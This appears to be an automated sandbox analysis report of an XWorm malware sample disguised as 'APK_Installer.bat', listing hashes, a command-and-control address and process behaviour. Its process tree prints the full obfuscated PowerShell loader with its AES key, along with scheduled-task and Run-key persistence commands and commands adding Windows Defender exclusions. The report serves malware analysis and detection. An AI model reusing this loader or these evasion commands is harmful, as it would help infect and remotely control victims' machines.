Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-05-2024 17:42
Static task
static1
Behavioral task
behavioral1
Sample
APK_Installer.bat
Resource
win11-20240508-en
General
-
Target
APK_Installer.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2072-47-0x00000196A50E0000-0x00000196A50FA000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 14 2072 powershell.exe 20 2072 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4552 powershell.exe 2072 powershell.exe 904 powershell.exe 3448 powershell.exe 3324 powershell.exe 1212 powershell.exe 3352 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2288 timeout.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 904 powershell.exe 904 powershell.exe 4552 powershell.exe 4552 powershell.exe 2072 powershell.exe 2072 powershell.exe 3448 powershell.exe 3448 powershell.exe 3324 powershell.exe 3324 powershell.exe 1212 powershell.exe 1212 powershell.exe 2072 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeIncreaseQuotaPrivilege 4552 powershell.exe Token: SeSecurityPrivilege 4552 powershell.exe Token: SeTakeOwnershipPrivilege 4552 powershell.exe Token: SeLoadDriverPrivilege 4552 powershell.exe Token: SeSystemProfilePrivilege 4552 powershell.exe Token: SeSystemtimePrivilege 4552 powershell.exe Token: SeProfSingleProcessPrivilege 4552 powershell.exe Token: SeIncBasePriorityPrivilege 4552 powershell.exe Token: SeCreatePagefilePrivilege 4552 powershell.exe Token: SeBackupPrivilege 4552 powershell.exe Token: SeRestorePrivilege 4552 powershell.exe Token: SeShutdownPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeSystemEnvironmentPrivilege 4552 powershell.exe Token: SeRemoteShutdownPrivilege 4552 powershell.exe Token: SeUndockPrivilege 4552 powershell.exe Token: SeManageVolumePrivilege 4552 powershell.exe Token: 33 4552 powershell.exe Token: 34 4552 powershell.exe Token: 35 4552 powershell.exe Token: 36 4552 powershell.exe Token: SeIncreaseQuotaPrivilege 4552 powershell.exe Token: SeSecurityPrivilege 4552 powershell.exe Token: SeTakeOwnershipPrivilege 4552 powershell.exe Token: SeLoadDriverPrivilege 4552 powershell.exe Token: SeSystemProfilePrivilege 4552 powershell.exe Token: SeSystemtimePrivilege 4552 powershell.exe Token: SeProfSingleProcessPrivilege 4552 powershell.exe Token: SeIncBasePriorityPrivilege 4552 powershell.exe Token: SeCreatePagefilePrivilege 4552 powershell.exe Token: SeBackupPrivilege 4552 powershell.exe Token: SeRestorePrivilege 4552 powershell.exe Token: SeShutdownPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeSystemEnvironmentPrivilege 4552 powershell.exe Token: SeRemoteShutdownPrivilege 4552 powershell.exe Token: SeUndockPrivilege 4552 powershell.exe Token: SeManageVolumePrivilege 4552 powershell.exe Token: 33 4552 powershell.exe Token: 34 4552 powershell.exe Token: 35 4552 powershell.exe Token: 36 4552 powershell.exe Token: SeIncreaseQuotaPrivilege 4552 powershell.exe Token: SeSecurityPrivilege 4552 powershell.exe Token: SeTakeOwnershipPrivilege 4552 powershell.exe Token: SeLoadDriverPrivilege 4552 powershell.exe Token: SeSystemProfilePrivilege 4552 powershell.exe Token: SeSystemtimePrivilege 4552 powershell.exe Token: SeProfSingleProcessPrivilege 4552 powershell.exe Token: SeIncBasePriorityPrivilege 4552 powershell.exe Token: SeCreatePagefilePrivilege 4552 powershell.exe Token: SeBackupPrivilege 4552 powershell.exe Token: SeRestorePrivilege 4552 powershell.exe Token: SeShutdownPrivilege 4552 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeSystemEnvironmentPrivilege 4552 powershell.exe Token: SeRemoteShutdownPrivilege 4552 powershell.exe Token: SeUndockPrivilege 4552 powershell.exe Token: SeManageVolumePrivilege 4552 powershell.exe Token: 33 4552 powershell.exe Token: 34 4552 powershell.exe Token: 35 4552 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2072 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.execmd.exedescription pid process target process PID 1460 wrote to memory of 904 1460 cmd.exe powershell.exe PID 1460 wrote to memory of 904 1460 cmd.exe powershell.exe PID 904 wrote to memory of 4552 904 powershell.exe powershell.exe PID 904 wrote to memory of 4552 904 powershell.exe powershell.exe PID 904 wrote to memory of 1836 904 powershell.exe WScript.exe PID 904 wrote to memory of 1836 904 powershell.exe WScript.exe PID 1836 wrote to memory of 3052 1836 WScript.exe cmd.exe PID 1836 wrote to memory of 3052 1836 WScript.exe cmd.exe PID 3052 wrote to memory of 2072 3052 cmd.exe powershell.exe PID 3052 wrote to memory of 2072 3052 cmd.exe powershell.exe PID 2072 wrote to memory of 3448 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 3448 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 3324 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 3324 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1212 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1212 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 3352 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 3352 2072 powershell.exe powershell.exe PID 2072 wrote to memory of 1940 2072 powershell.exe schtasks.exe PID 2072 wrote to memory of 1940 2072 powershell.exe schtasks.exe PID 2072 wrote to memory of 1276 2072 powershell.exe schtasks.exe PID 2072 wrote to memory of 1276 2072 powershell.exe schtasks.exe PID 2072 wrote to memory of 5036 2072 powershell.exe cmd.exe PID 2072 wrote to memory of 5036 2072 powershell.exe cmd.exe PID 5036 wrote to memory of 2288 5036 cmd.exe timeout.exe PID 5036 wrote to memory of 2288 5036 cmd.exe timeout.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_211_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_211.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_211.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_211.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_211.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_211.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3352
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:1940
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"6⤵PID:1276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1EF.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:2288
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD59b700dd28cad30c7ed7a7e6fc6367002
SHA1ef00fcc0d512758d428a5c0c73c34f0c01cefdeb
SHA2568b8532ff0ed06dd5696cdf54fc5909757444e82f5739d8402e2534e813573ddd
SHA5128bd5d5209fce602c1bb4eacf081744a5a5524cc05d48adf9e2343f49b7a1f9e510cc859d1796d84291ba0172059ca7bd32bfd1d0840310cafb18839257bd375a
-
Filesize
1KB
MD5d8528086c51c4f1528a9676038ec213e
SHA1bd32a682d9df21d36799486346aa1235c96b4d6a
SHA2567cd0a49f94c512e57e0a7102352ee68c5d7a320db0eec57aea0d5e648d4bcf4a
SHA512e89d008113f89b978fb65bd6dd0bcde3c4506fbb14e54aa5296607ae34d94081d1e825750dbd9dd864adea462c8dc1263e3d138c041b3d4b7dee78debdef7374
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
170B
MD5c177a7409cb8dd0f1a2b16ee4f77cd48
SHA1627611a449fd264ebd7e64c599d038354e6f738c
SHA256079e83e42525b1adf9dee2c12a1fe62c14dc99cb74ceae640c0ecdc8eb13190b
SHA512a4514c0070359ea76f6cc46aec13f57b5cfee1cb5ab9e4261a28c84a756085a407feb87deeda1e0ce43d341e38064115d159ca494e77678bbceb1d61e4c1ec66
-
Filesize
302KB
MD57a5f5944302b8298714b56ae2f138b7c
SHA1669b42f2f6e76895899d84d5ad7a12f23d951f13
SHA2563f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
SHA51273049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
Filesize
115B
MD591a5a534d4321ddb5206d899df290d34
SHA136298336b90b1bcfb811eea2c78eb5813f7699bb
SHA256247b0003fab14a41c2c51e39dbddf4bce98548fdf98559b9657e914b7b38b197
SHA512d3a925b589809e5c89f5490e767d6cc0b000c1f8e2218279890ad73c166a7f197ffbdfcc8b11699d74d2b5a8597f655b27560eda18f88f549ccade3fe7259ce2